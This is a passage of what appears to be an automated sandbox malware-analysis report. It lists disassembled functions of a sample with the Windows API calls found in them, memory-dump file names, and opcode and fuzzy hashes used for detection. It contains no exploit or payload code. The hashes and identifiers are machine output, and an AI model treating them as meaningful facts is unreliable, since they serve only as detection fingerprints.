                                                                                              • Opcode Fuzzy Hash: a67e1ea2ce69b17e1947db97ab4e6f0962c5125d9ecdb5d19a2e4f00662afb2d
                                                                                              • Instruction Fuzzy Hash: E6110A336002356FAB21EE1DDC44A5E7395AB843687164223FD25EB254D731ED0187D6
                                                                                              Function 00C69215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 493e3013abc55b712dead9e33f109f89a0c4e074a37d98745522292b0985c6a5
                                                                                              • Instruction ID: 5b7b797b1f517eaad44b1350d415e9ebf539acb44ddbd455484fcb75e0887d79
                                                                                              • Opcode Fuzzy Hash: 493e3013abc55b712dead9e33f109f89a0c4e074a37d98745522292b0985c6a5
                                                                                              • Instruction Fuzzy Hash: D7016573D00528ABCF31ABA8CDD19DEB735EF88750F054525E816BB262DA348D05D6A0
                                                                                              Function 00C83C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00C83C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: fe14b29fe6968ef15c8ae87a91ea2f420a303bd1c4fec7c71b2131593203f5aa
                                                                                              • Instruction ID: 5ff757dbda86c09ddf8dea6636b2d8382ab2c85af1e8c6d7969d858dbb0ca0fd
                                                                                              • Opcode Fuzzy Hash: fe14b29fe6968ef15c8ae87a91ea2f420a303bd1c4fec7c71b2131593203f5aa
                                                                                              • Instruction Fuzzy Hash: 1EF0EC322002969FCF116EA9EC04A9B7799FF01F247105225FA15E7190DB31DB20D7A4
                                                                                              Function 00C88E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 54f596446a575793924f2339a9f22b2cd56cde663842a77d764713efa8680e3d
                                                                                              • Instruction ID: c4e4d5dfb7473db897434f9ed92d245681e16685fe7d7016fe76494c2a633caa
                                                                                              • Opcode Fuzzy Hash: 54f596446a575793924f2339a9f22b2cd56cde663842a77d764713efa8680e3d
                                                                                              • Instruction Fuzzy Hash: 18E0ED3924662556EA7136629C09BAF76889F413ACF950121BC2897C91CF20CE0493EC
                                                                                              Function 00C65ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C65AC2
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 37368e369976a80ee921dc5e1d613eacbbc20193044481715cf809deb7eabe0d
                                                                                              • Instruction ID: 1f1e44666d5cfbfef501cce5eaaddc226e3fde61b8dd41da572ebcd4d6edfb05
                                                                                              • Opcode Fuzzy Hash: 37368e369976a80ee921dc5e1d613eacbbc20193044481715cf809deb7eabe0d
                                                                                              • Instruction Fuzzy Hash: 83014F30911794DAD725E7B8C0657EDFBE4DF65304F64848EB85A63282CBB41B08E7A2
                                                                                              Function 00C6A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4
                                                                                                • Part of subcall function 00C6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
                                                                                                • Part of subcall function 00C6A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: 57f7feb3256091b1c4dcbf7836d521c20919b36e0bc5ca42dd9c7366d8d1624f
                                                                                              • Instruction ID: 3609c3f3ac8bfed4465ba982b6b376ad3d78ecd2020ee84fad6b2a200d4f33cd
                                                                                              • Opcode Fuzzy Hash: 57f7feb3256091b1c4dcbf7836d521c20919b36e0bc5ca42dd9c7366d8d1624f
                                                                                              • Instruction Fuzzy Hash: 73F08931008790AACB3267B489847CB7B905F15331F048A4EF1FE62196C37550949F23
                                                                                              Function 00C70E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00C70E3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 47c0f2b17a9c04d9235f75ea33764fe34db6194d2afbd4f00cf3329a41d66f9d
                                                                                              • Instruction ID: 62c8a29db4e27746d64c4d3e6d3d2b2a8409235deb946b92c96b052fd87b3131
                                                                                              • Opcode Fuzzy Hash: 47c0f2b17a9c04d9235f75ea33764fe34db6194d2afbd4f00cf3329a41d66f9d
                                                                                              • Instruction Fuzzy Hash: 7CD02B1060109467DF21372C28597FF35068FC7310F0C4026F99D67283CE444882B361
                                                                                              Function 00C7A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C
                                                                                                • Part of subcall function 00C7A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction ID: c7400c4c6a065cac5feae6db88dfa657c7d63bca4f29af66059750b58ba13829
                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction Fuzzy Hash: 6FD0C971210209BADF426F628C1296E7A99EB80340F04C125B85AD5191EAB1DA10A666
                                                                                              Function 00C7E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00C7E5E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: 79d5998d5bf293cd115d7d720f7f6c2ecabadb3a55b5a9eb8ba76ac841d7a777
                                                                                              • Instruction ID: 1227d125311b32bd8c0a0dfc4e38425c0742c57f4786d9836e6920a8e90c6cda
                                                                                              • Opcode Fuzzy Hash: 79d5998d5bf293cd115d7d720f7f6c2ecabadb3a55b5a9eb8ba76ac841d7a777
                                                                                              • Instruction Fuzzy Hash: 83D022B20C02808BC302EBAAD8C6F0C3358BB2E700FA880C1F50CC9092CB608080D702
                                                                                              Function 00C7DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00C71B3E), ref: 00C7DD92
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: 8b1385b8d2be17464b0f1fc126ab756d51d26706fc4e1ac85d7b74eed5069aea
                                                                                              • Instruction ID: 96be3fa730d492929ccc00edd92091594faf5cda06a15db5d663849b86e7f2ef
                                                                                              • Opcode Fuzzy Hash: 8b1385b8d2be17464b0f1fc126ab756d51d26706fc4e1ac85d7b74eed5069aea
                                                                                              • Instruction Fuzzy Hash: 61D09E32144300BAD6012B51DD06F0E7AB2AB88B08F008554B288740F286729D31EB11
                                                                                              Function 00C698BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00C697BE), ref: 00C698C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 676c9c29906d73c017be3d08bf3fff09ab0324909dbac0e9e13f4dc42cf7490f
                                                                                              • Instruction ID: b8f4bda709f51fee3be1b76b8b1e20ff1a149bfed2e95804fd18a7ea0ea21ee2
                                                                                              • Opcode Fuzzy Hash: 676c9c29906d73c017be3d08bf3fff09ab0324909dbac0e9e13f4dc42cf7490f
                                                                                              • Instruction Fuzzy Hash: BAC01238400205C68E308B2498C80997326EA573A6BB4A694C038CA0E1C332CE8BEA00
                                                                                              Function 00C7E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c86d05457650096ef02b96b55e55486def3aecec92379f8f4d3ecdbcf09c1706
                                                                                              • Instruction ID: 327aa3a2770120b357fbda7434c813c590048cea42d2691fa981a704fe0b0a98
                                                                                              • Opcode Fuzzy Hash: c86d05457650096ef02b96b55e55486def3aecec92379f8f4d3ecdbcf09c1706
                                                                                              • Instruction Fuzzy Hash: 7DB012D735C140BD3A04A14A6C47D3F011CC1C9B10330C47EFC19C04C1D840EC002432
                                                                                              Function 00C7E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b62e94b1a6896d7fe265338ca571c54469a7de9a8f9fcf6f842e5ab82327f658
                                                                                              • Instruction ID: 5c3f3d28730a32e6962a6ca12988debcf5e1487a3f94130612f0f78f7fcb1fe7
                                                                                              • Opcode Fuzzy Hash: b62e94b1a6896d7fe265338ca571c54469a7de9a8f9fcf6f842e5ab82327f658
                                                                                              • Instruction Fuzzy Hash: BDB012D735C140BD3A04D14E6C47E3F011CC1C8B10330C07EF81DC10C1D840AC002532
                                                                                              Function 00C7E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a54bbacdc273ddaa6bf37116dead708184dab475b38962ac09d4b85528308b97
                                                                                              • Instruction ID: 44b84f0a144c57da3aa8765992262a0be92161f4eb5b626250ba56094259c6a5
                                                                                              • Opcode Fuzzy Hash: a54bbacdc273ddaa6bf37116dead708184dab475b38962ac09d4b85528308b97
                                                                                              • Instruction Fuzzy Hash: C5B012D325C040BD3A04E20A6C07E3F010CC1C9B10330C07FFC1DC11C1D840AC042432
                                                                                              Function 00C7EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7EAF9
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b8367e5c2e20f1e778e2bec9d9d8571b1bacfc4d20371075ee41ab1680e034a9
                                                                                              • Instruction ID: 0b1117a97de47616f2fcd1f630c322b93b17dd1e14d886e2dce086ddcfaaae74
                                                                                              • Opcode Fuzzy Hash: b8367e5c2e20f1e778e2bec9d9d8571b1bacfc4d20371075ee41ab1680e034a9
                                                                                              • Instruction Fuzzy Hash: DFB012C72DA0827C3A0462056D86D37021CC1C4BA0330C07EF518C80C1DC804C012432
                                                                                              Function 00C7E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
